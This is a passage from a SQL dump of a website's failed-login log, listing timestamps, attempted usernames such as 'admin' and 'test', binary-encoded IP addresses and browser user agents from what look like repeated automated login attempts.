Firefox/62.0'),(5789,9453,1629901789.223773,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��G','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5790,9453,1629901789.244396,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��>��G','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5791,9454,1629902112.836854,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5792,9454,1629902112.875150,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5793,9455,1629902135.385379,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�?�','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.153 Safari/537.36'),(5794,9456,1629902447.617650,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5795,9457,1629902526.313052,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��E�','Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5796,9458,1629903373.198438,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.70 Safari/537.36'),(5797,9459,1629904903.281018,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ϴ�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/62.0.3202.94 Safari/537.36'),(5798,9462,1629907173.598400,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/58.0.3029.110 Safari/537.36'),(5799,9465,1629909420.214503,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����^','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.88 Safari/537.36'),(5800,9472,1629912323.753912,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���6�J','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_4) AppleWebKit/537.78.2 (KHTML, like Gecko) Version/7.0.6 Safari/537.78.2'),(5801,9475,1629913960.360786,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����[','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(5802,9476,1629914726.769203,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��ܧe','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36 MVisionPlayer/1.0.0.0'),(5803,9644,1630065274.691658,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5804,9645,1630066370.274006,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���[h�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5805,9646,1630067442.055190,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���;=�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5806,9647,1630067991.298633,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0��k�<�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5807,9648,1630068557.698453,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���R�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5808,9742,1630134557.250062,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���6�J','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36'),(5809,9759,1630155069.333936,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����Kj','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36'),(5810,9892,1630205204.436074,1,'loginFailInvalidUsername','bournesociety',0,'\0\0\0\0\0\0\0\0\0\0���6�J','Mozilla/5.0 (X11; Linux x86_64; rv:31.0) Gecko/20100101 Firefox/31.0'),(5811,9953,1630239890.528987,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��3S�\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5812,9987,1630256457.866522,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36'),(5813,10124,1630293315.405076,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5814,10206,1630323765.161102,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��t�$','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5815,10229,1630338569.379260,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0�����V','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5816,10238,1630339498.884512,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5817,10244,1630340437.085529,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����9d','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5818,10247,1630340815.731720,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��6�%�','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36'),(5819,10253,1630341404.994704,1,'loginFailInvalidUsername','enamad',0,'\0\0\0\0\0\0\0\0\0\0���,��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5820,10264,1630342798.353121,1,'loginFailInvalidUsername','123456',0,'\0\0\0\0\0\0\0\0\0\0��3���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5821,10270,1630343770.363209,1,'loginFailInvalidUsername','xrumertest',0,'\0\0\0\0\0\0\0\0\0\0���י�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5822,10271,1630343970.321919,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���#�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5823,10282,1630345729.525244,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0���\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5824,10286,1630346221.775132,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���G�-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5825,10294,1630347201.638365,1,'loginFailInvalidUsername','private',0,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5826,10299,1630348214.713069,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��r!Z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5827,10305,1630349083.101476,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��J�+','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5828,10309,1630349640.573747,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��h�,','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5829,10313,1630350121.329480,1,'loginFailInvalidUsername','johnmiller83',0,'\0\0\0\0\0\0\0\0\0\0��]r��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5830,10324,1630351582.370467,1,'loginFailInvalidUsername','12345678',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5831,10328,1630352082.370793,1,'loginFailInvalidUsername','garak',0,'\0\0\0\0\0\0\0\0\0\0��l�7�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5832,10331,1630352636.059056,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5833,10339,1630354100.924018,1,'loginFailInvalidUsername','cristina',0,'\0\0\0\0\0\0\0\0\0\0����2<','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5834,10343,1630354625.866489,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��^��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5835,10344,1630354835.020242,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��N.L�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5836,10346,1630355076.256168,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���AL','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5837,10347,1630355089.838386,1,'loginFailInvalidUsername','testuser',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5838,10352,1630356128.684392,1,'loginFailInvalidUsername','123456789',0,'\0\0\0\0\0\0\0\0\0\0���	�C','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5839,10356,1630356588.885275,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��/���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5840,10361,1630357665.402112,1,'loginFailInvalidUsername','guest',0,'\0\0\0\0\0\0\0\0\0\0��e \Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5841,10364,1630358117.962442,1,'loginFailInvalidUsername','user2',0,'\0\0\0\0\0\0\0\0\0\0��}�̙','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5842,10368,1630358658.398614,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��	�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5843,10373,1630359652.144368,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��g�~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5844,10379,1630360731.733779,1,'loginFailInvalidUsername','testtest',0,'\0\0\0\0\0\0\0\0\0\0��)�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5845,10381,1630361184.659173,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0����^{','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5846,10388,1630362179.033300,1,'loginFailInvalidUsername','dsa',0,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5847,10391,1630362712.227652,1,'loginFailInvalidUsername','1234567',0,'\0\0\0\0\0\0\0\0\0\0���}��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5848,10394,1630363314.279624,1,'loginFailInvalidUsername','test2',0,'\0\0\0\0\0\0\0\0\0\0���:�3','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5849,10400,1630364490.699685,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h�-�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5850,10402,1630364831.784423,1,'loginFailInvalidUsername','qwerty',0,'\0\0\0\0\0\0\0\0\0\0����\r','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5851,10405,1630365429.011502,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��e \Z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5852,10407,1630365884.938229,1,'loginFailInvalidUsername','tester',0,'\0\0\0\0\0\0\0\0\0\0��g\\�z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5853,10411,1630366373.417036,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0�����z','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5854,10414,1630366998.047826,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��)�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5855,10417,1630367472.710565,1,'loginFailInvalidUsername','demo',0,'\0\0\0\0\0\0\0\0\0\0��ÚW�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5856,10419,1630367980.695255,1,'loginFailInvalidUsername','test123',0,'\0\0\0\0\0\0\0\0\0\0���YY�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5857,10422,1630368557.027883,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5858,10428,1630369611.641405,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��Kw��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5859,10431,1630370639.202326,1,'loginFailInvalidUsername','testing',0,'\0\0\0\0\0\0\0\0\0\0���\"��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5860,10437,1630372232.368471,1,'loginFailInvalidUsername','[login]',0,'\0\0\0\0\0\0\0\0\0\0��]r��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5861,10441,1630372814.969662,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��-wU�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5862,10444,1630373391.385847,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g|_h','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5863,10446,1630373817.883210,1,'loginFailInvalidUsername','test1',0,'\0\0\0\0\0\0\0\0\0\0��)�H�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5864,10450,1630374462.689215,1,'loginFailInvalidUsername','prueba',0,'\0\0\0\0\0\0\0\0\0\0���PK','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5865,10452,1630375074.354890,1,'loginFailInvalidUsername','123',0,'\0\0\0\0\0\0\0\0\0\0����8f','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5866,10454,1630375539.512770,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0��3QQ\n','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5867,10458,1630376088.373800,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0��z�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5868,10461,1630377165.598402,1,'loginFailInvalidUsername','jsjobs_employer',0,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5869,10467,1630378322.758593,1,'loginFailInvalidUsername','user',0,'\0\0\0\0\0\0\0\0\0\0���2=�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5870,10469,1630378723.350721,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��h-)-','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5871,10471,1630378802.867359,1,'loginFailInvalidUsername','test1',0,'\0\0\0\0\0\0\0\0\0\0��Ú�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5872,10473,1630379399.959131,1,'loginFailInvalidUsername','demo',0,'\0\0\0\0\0\0\0\0\0\0���	6�','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5873,10476,1630379957.779741,1,'loginFailInvalidUsername','teste',0,'\0\0\0\0\0\0\0\0\0\0��?\"��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5874,10485,1630382084.262866,1,'loginFailInvalidUsername','wakgos',0,'\0\0\0\0\0\0\0\0\0\0��g	��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5875,10489,1630383181.237320,1,'loginFailInvalidUsername','test',0,'\0\0\0\0\0\0\0\0\0\0���A��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5876,10497,1630384883.750568,1,'loginFailInvalidUsername','1',0,'\0\0\0\0\0\0\0\0\0\0��g�~','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5877,10500,1630385421.751568,1,'loginFailValidUsername','Admin',1,'\0\0\0\0\0\0\0\0\0\0��#ȉ\\','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5878,10502,1630385930.372731,1,'loginFailInvalidUsername','patricia',0,'\0\0\0\0\0\0\0\0\0\0���;uA','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5879,10504,1630386553.784460,1,'loginFailInvalidUsername','-',0,'\0\0\0\0\0\0\0\0\0\0��3���','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5880,10511,1630388394.829477,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g�p','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5881,10512,1630388751.670010,1,'loginFailInvalidUsername','123',0,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5882,10521,1630390771.026945,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��g��','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5883,10548,1630396802.741014,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��#ɮ','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5884,10552,1630397408.274646,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0�����','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5885,10556,1630401397.276833,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0���9�8','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36'),(5886,10571,1630415711.287835,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��X&�','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36'),(5887,10621,1630463274.746683,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0'),(5888,10636,1630521280.326120,1,'loginFailInvalidUsername','worldofghibli4',0,'\0\0\0\0\0\0\0\0\0\0��i�O','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5889,10637,1630521281.931266,1,'loginFailInvalidUsername','worldofghibli4',0,'\0\0\0\0\0\0\0\0\0\0��i�O','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5890,10638,1630521288.208702,1,'loginFailInvalidUsername','worldofghibli4',0,'\0\0\0\0\0\0\0\0\0\0��i�O','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5891,10639,1630521290.663397,1,'loginFailInvalidUsername','worldofghibli4',0,'\0\0\0\0\0\0\0\0\0\0��i�O','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5892,10640,1630521293.626138,1,'loginFailInvalidUsername','worldofghibli4',0,'\0\0\0\0\0\0\0\0\0\0��i�O','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5893,10641,1630521296.820350,1,'loginFailInvalidUsername','worldofghibli4',0,'\0\0\0\0\0\0\0\0\0\0��i�O','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5894,10642,1630521301.149004,1,'loginFailInvalidUsername','worldofghibli4',0,'\0\0\0\0\0\0\0\0\0\0��i�O','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5895,10643,1630521304.069636,1,'loginFailInvalidUsername','worldofghibli4',0,'\0\0\0\0\0\0\0\0\0\0��i�O','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5896,10644,1630521306.850626,1,'loginFailInvalidUsername','worldofghibli4',0,'\0\0\0\0\0\0\0\0\0\0��i�O','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5897,10645,1630521309.154197,1,'loginFailInvalidUsername','worldofghibli4',0,'\0\0\0\0\0\0\0\0\0\0��i�O','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5898,10646,1630521311.112809,1,'loginFailInvalidUsername','worldofghibli4',0,'\0\0\0\0\0\0\0\0\0\0��i�O','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5899,10647,1630521314.438635,1,'loginFailInvalidUsername','worldofghibli4',0,'\0\0\0\0\0\0\0\0\0\0��i�O','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5900,10648,1630521318.734478,1,'loginFailInvalidUsername','worldofghibli4',0,'\0\0\0\0\0\0\0\0\0\0��i�O','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5901,10648,1630521318.779152,1,'loginFailInvalidUsername','worldofghibli4',0,'\0\0\0\0\0\0\0\0\0\0��i�O','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5902,10649,1630521322.647883,1,'loginFailInvalidUsername','worldofghibli4',0,'\0\0\0\0\0\0\0\0\0\0��i�O','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5903,10649,1630521322.709210,1,'loginFailInvalidUsername','worldofghibli4',0,'\0\0\0\0\0\0\0\0\0\0��i�O','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5904,10650,1630521324.263013,1,'loginFailInvalidUsername','worldofghibli4',0,'\0\0\0\0\0\0\0\0\0\0��i�O','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5905,10651,1630521329.246507,1,'loginFailInvalidUsername','worldofghibli4',0,'\0\0\0\0\0\0\0\0\0\0��i�O','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5906,10651,1630521329.289889,1,'loginFailInvalidUsername','worldofghibli4',0,'\0\0\0\0\0\0\0\0\0\0��i�O','Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4240.193 Safari/537.36'),(5907,10674,1630565137.374103,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0����-','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0'),(5908,10678,1630576784.123068,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^�g','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0'),(5909,10678,1630576784.269450,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��^�g','Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:87.0) Gecko/20100101 Firefox/87.0'),(5910,10776,1630642352.645975,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0������','Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0'),(5911,10785,1630647837.372976,1,'loginFailValidUsername','admin',1,'\0\0\0\0\0\0\0\0\0\0��tv0�','Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.106 